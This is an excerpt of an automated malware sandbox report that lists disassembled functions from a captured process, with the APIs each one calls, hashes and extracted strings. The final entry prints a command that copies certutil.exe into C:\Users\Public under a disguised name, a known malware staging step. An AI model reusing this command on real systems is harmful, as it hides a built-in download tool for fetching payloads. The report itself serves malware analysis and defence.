                                                                                                                                                                        • Instruction ID: 9c6e238f07f120f9c37ef0aba21584a856fe203490298f3760e695a72d79fa38
                                                                                                                                                                        • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                                                                        • Instruction Fuzzy Hash: 6CA1D563A08642C2EE209F55D4103B963A0FF85F90F904531DA4D877C4EF7EE94ADB0A
                                                                                                                                                                        Function 00007FF6E9437610 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 228COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$wcscmp
                                                                                                                                                                        • String ID: %s
                                                                                                                                                                        • API String ID: 243296809-3043279178
                                                                                                                                                                        • Opcode ID: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                                                                                                                                                        • Instruction ID: 35457dfb64f697f5c90f31c868b0243bc84987408edfc81b52f1e5144c35dd8f
                                                                                                                                                                        • Opcode Fuzzy Hash: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                                                                                                                                                        • Instruction Fuzzy Hash: E7A18A33A09686D6EB25DF31D8443F963A0BF48748F104035DA8E8BA95EF3DE649C306
                                                                                                                                                                        Function 00007FF6E9421F90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$EnvironmentVariable
                                                                                                                                                                        • String ID: DIRCMD
                                                                                                                                                                        • API String ID: 1405722092-1465291664
                                                                                                                                                                        • Opcode ID: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                                                                                                                                                        • Instruction ID: acfadb4ba49177fda3485167a3b96f281019fc866320c404ac550f03985678f9
                                                                                                                                                                        • Opcode Fuzzy Hash: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                                                                                                                                                        • Instruction Fuzzy Hash: BB812773A18B82CAEB24CF60A8803ED37A5FB48748F404139DA8D97B59DF39D149C705
                                                                                                                                                                        Function 00007FF6E94299F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E942CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDA6
                                                                                                                                                                          • Part of subcall function 00007FF6E942CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDBD
                                                                                                                                                                        • wcschr.MSVCRT(?,?,?,00007FF6E94299DD), ref: 00007FF6E9429A39
                                                                                                                                                                          • Part of subcall function 00007FF6E942DF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF6E942CEAA), ref: 00007FF6E942DFB8
                                                                                                                                                                          • Part of subcall function 00007FF6E942DF60: RtlFreeHeap.NTDLL ref: 00007FF6E942DFCC
                                                                                                                                                                          • Part of subcall function 00007FF6E942DF60: _setjmp.MSVCRT ref: 00007FF6E942E03E
                                                                                                                                                                        • wcschr.MSVCRT(?,?,?,00007FF6E94299DD), ref: 00007FF6E9429AF0
                                                                                                                                                                        • wcschr.MSVCRT(?,?,?,00007FF6E94299DD), ref: 00007FF6E9429B0F
                                                                                                                                                                          • Part of subcall function 00007FF6E94296E8: memset.MSVCRT ref: 00007FF6E94297B2
                                                                                                                                                                          • Part of subcall function 00007FF6E94296E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6E9429880
                                                                                                                                                                        • _wcsupr.MSVCRT ref: 00007FF6E943B844
                                                                                                                                                                        • wcscmp.MSVCRT ref: 00007FF6E943B86D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
                                                                                                                                                                        • String ID: FOR$ IF
                                                                                                                                                                        • API String ID: 3663254013-2924197646
                                                                                                                                                                        • Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                                                                                                        • Instruction ID: 0d2ed727146c01d6f6c589edf85a176df06e4c886f7892e0da1609d90f30bbe4
                                                                                                                                                                        • Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                                                                                                        • Instruction Fuzzy Hash: 24515C22B09742C1FE19EF35951837926A1FF85B90F484635D91EC77D5DE3EA409C30A
                                                                                                                                                                        Function 00007FF6E942F173 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • iswdigit.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F0D6
                                                                                                                                                                        • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF6E942E626,?,?,00000000,00007FF6E9431F69), ref: 00007FF6E942F1BA
                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F1E7
                                                                                                                                                                        • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF6E942E626,?,?,00000000,00007FF6E9431F69), ref: 00007FF6E942F1FF
                                                                                                                                                                        • iswdigit.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F2BB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: iswdigit$iswspacewcschr
                                                                                                                                                                        • String ID: )$=,;
                                                                                                                                                                        • API String ID: 1959970872-2167043656
                                                                                                                                                                        • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                                                                                        • Instruction ID: bced797ef8aaf701db302e535f7259d5add735f7a748c36dbd60f535f1d3421f
                                                                                                                                                                        • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                                                                                        • Instruction Fuzzy Hash: EA418763E08656C6FB648F11A91437926A0BF12751FC45071CE89C36A4DF3EA8C9CB0A
                                                                                                                                                                        Function 00007FF6E944BA40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                                                                                                                                        • String ID: %04X-%04X$:
                                                                                                                                                                        • API String ID: 930873262-1938371929
                                                                                                                                                                        • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                                                                                        • Instruction ID: f771fb9a206d89ed07e728582aba313c4fa3f57fe4d45a320697e07c221ef564
                                                                                                                                                                        • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                                                                                        • Instruction Fuzzy Hash: 2A416033A08A82D2EB209F60E4543BA62A0FF84B55F408135EA4DC37D5DF7ED549CB1A
                                                                                                                                                                        Function 00007FF6E94336EC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                                                                                                        • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                                                                                        • API String ID: 3249344982-2616576482
                                                                                                                                                                        • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                                                                                        • Instruction ID: afd473c8b172a1a6a0acfaa2e4c080aafd8906148edc118c83226cbad4888695
                                                                                                                                                                        • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                                                                                        • Instruction Fuzzy Hash: 9C413CB3A18B41C6E3108F22A84436ABAA4FF99FD4F448234DE4987794DF3ED058CB05
                                                                                                                                                                        Function 00007FF6E9436A28 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • iswdigit.MSVCRT(?,?,00000000,00007FF6E94368A3,?,?,?,?,?,?,?,00000000,?,00007FF6E94363F3), ref: 00007FF6E9436A73
                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF6E94368A3,?,?,?,?,?,?,?,00000000,?,00007FF6E94363F3), ref: 00007FF6E9436A91
                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF6E94368A3,?,?,?,?,?,?,?,00000000,?,00007FF6E94363F3), ref: 00007FF6E9436AB0
                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF6E94368A3,?,?,?,?,?,?,?,00000000,?,00007FF6E94363F3), ref: 00007FF6E9436AE3
                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF6E94368A3,?,?,?,?,?,?,?,00000000,?,00007FF6E94363F3), ref: 00007FF6E9436B01
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcschr$iswdigit
                                                                                                                                                                        • String ID: +-~!$<>+-*/%()|^&=,
                                                                                                                                                                        • API String ID: 2770779731-632268628
                                                                                                                                                                        • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                                                                                        • Instruction ID: d1eaea56e18961bb9ded95bda3c1f7ce2e9bf041a81c57b9241f71090c632751
                                                                                                                                                                        • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                                                                                        • Instruction Fuzzy Hash: 49314A23A08A66C5EB509F21E4543B876E0FF89F85F458135DA5E83354EF3EE408CB0A
                                                                                                                                                                        Function 00007FF6E944D878 Relevance: 12.1, APIs: 8, Instructions: 89fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3192234081-0
                                                                                                                                                                        • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                                                                                                        • Instruction ID: f99a1edee0e1ff12da2a849b209d092ced9032218604413df3693930f121ead5
                                                                                                                                                                        • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                                                                                                        • Instruction Fuzzy Hash: 54317033608641CBE714AF21A40477DBBA1FF89B90F449134DE4A87795DE3EE409CB05
                                                                                                                                                                        Function 00007FF6E9431630 Relevance: 10.7, APIs: 7, Instructions: 208memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF6E94314D6,?,?,?,00007FF6E942AA22,?,?,?,00007FF6E942847E), ref: 00007FF6E9431673
                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6E94314D6,?,?,?,00007FF6E942AA22,?,?,?,00007FF6E942847E), ref: 00007FF6E943168D
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6E94314D6,?,?,?,00007FF6E942AA22,?,?,?,00007FF6E942847E), ref: 00007FF6E9431757
                                                                                                                                                                        • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6E94314D6,?,?,?,00007FF6E942AA22,?,?,?,00007FF6E942847E), ref: 00007FF6E943176E
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6E94314D6,?,?,?,00007FF6E942AA22,?,?,?,00007FF6E942847E), ref: 00007FF6E9431788
                                                                                                                                                                        • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6E94314D6,?,?,?,00007FF6E942AA22,?,?,?,00007FF6E942847E), ref: 00007FF6E943179C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$Process$Alloc$Size
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3586862581-0
                                                                                                                                                                        • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                                                                                                        • Instruction ID: 50835d2b4bf742166f856a9015a8a62cf8b4cf7b5669938d66c86c7e25ba8232
                                                                                                                                                                        • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                                                                                                        • Instruction Fuzzy Hash: 0E916DB3A09B42C1EA14DF75A84837866A0FF48B90F598135DE5D873A4DF3EE449C30A
                                                                                                                                                                        Function 00007FF6E94386F0 Relevance: 10.7, APIs: 7, Instructions: 154COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1313749407-0
                                                                                                                                                                        • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                                                                                                        • Instruction ID: 65ffbba6bddd6c846dbc08954bbfcf9ede96746683c7cd5330bc8be1b6c92710
                                                                                                                                                                        • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                                                                                                        • Instruction Fuzzy Hash: 3A519123A08682C2EB14DF3198083BDA691BF49B90F585230DD1E877D5EF3EE449C70A
                                                                                                                                                                        Function 00007FF6E944EC14 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 920682188-0
                                                                                                                                                                        • Opcode ID: 709d1c67be100917fc71fda4c7ad07296061441c4da44e249bcfadc6653ab77c
                                                                                                                                                                        • Instruction ID: d1ed92fc0177095cab6b8cb030e8fe2958ff7c8d3bc8245e35d863f763821477
                                                                                                                                                                        • Opcode Fuzzy Hash: 709d1c67be100917fc71fda4c7ad07296061441c4da44e249bcfadc6653ab77c
                                                                                                                                                                        • Instruction Fuzzy Hash: 41510032605B85CAEB25DF21E8547E877A1FF88B84F048129CA4E87764EF3DD649CB05
                                                                                                                                                                        Function 00007FF6E942DF60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF6E942E00B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$FreeProcess_setjmp
                                                                                                                                                                        • String ID: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
